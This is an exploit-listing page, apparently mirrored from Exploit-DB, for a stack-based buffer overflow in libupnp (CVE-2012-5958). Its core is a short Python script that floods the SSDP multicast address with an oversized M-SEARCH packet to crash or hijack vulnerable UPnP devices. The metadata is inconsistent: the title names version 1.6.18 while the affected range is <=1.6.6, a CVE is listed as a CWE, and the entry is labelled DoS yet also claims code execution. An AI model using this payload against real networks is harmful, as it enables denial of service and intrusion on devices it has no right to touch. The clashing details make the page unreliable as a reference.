header-logo
Suggest Exploit
vendor:
libupnp
by:
Patrik Lantz
7.5
CVSS
HIGH
Stack-based buffer overflow
119
CWE
Product Name: libupnp
Affected Version From: <= 1.6.6
Affected Version To: <= 1.6.6
Patch Exists: YES
Related CWE: CVE-2012-5958
CPE: a:pupnp:libupnp
Metasploit: https://www.rapid7.com/db/vulnerabilities/libupnp-cve-2012-5958/https://www.rapid7.com/db/vulnerabilities/suse-cve-2012-5958/https://www.rapid7.com/db/vulnerabilities/gentoo-linux-cve-2012-5958/
Other Scripts: N/A
Platforms Tested: Linux
2020

libupnp 1.6.18 – Stack-based buffer overflow (DoS)

A stack-based buffer overflow vulnerability exists in libupnp 1.6.18, which could allow an attacker to cause a denial of service (DoS) condition. The vulnerability is due to a lack of proper validation of user-supplied data when handling M-SEARCH packets. An attacker can send a specially crafted M-SEARCH packet to the vulnerable server, resulting in a stack-based buffer overflow. This can allow the attacker to execute arbitrary code in the context of the application.

Mitigation:

Upgrade to the latest version of libupnp
Source

Exploit-DB raw data:

# Exploit Title: libupnp 1.6.18 - Stack-based buffer overflow (DoS)
# Date: 2020-08-20
# Exploit Author: Patrik Lantz
# Vendor Homepage: https://pupnp.sourceforge.io/
# Software Link: https://sourceforge.net/projects/pupnp/files/pupnp/libUPnP%201.6.6/libupnp-1.6.6.tar.bz2/download
# Version: <= 1.6.6
# Tested on: Linux
# CVE : CVE-2012-5958

import socket

payload = "M-SEARCH * HTTP/1.1\r\nHOST: 239.255.255.250:1900\r\nST:uuid:schemas:device:"
payload += "A"*324 + "BBBB"
payload += ":urn:\r\nMX:2\r\nMAN:\"ssdp:discover\"\r\n\r\n"

byte_message = bytes(payload)
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.sendto(byte_message, ("239.255.255.250", 1900))

Navigation

Suggest Exploit

Services By CQR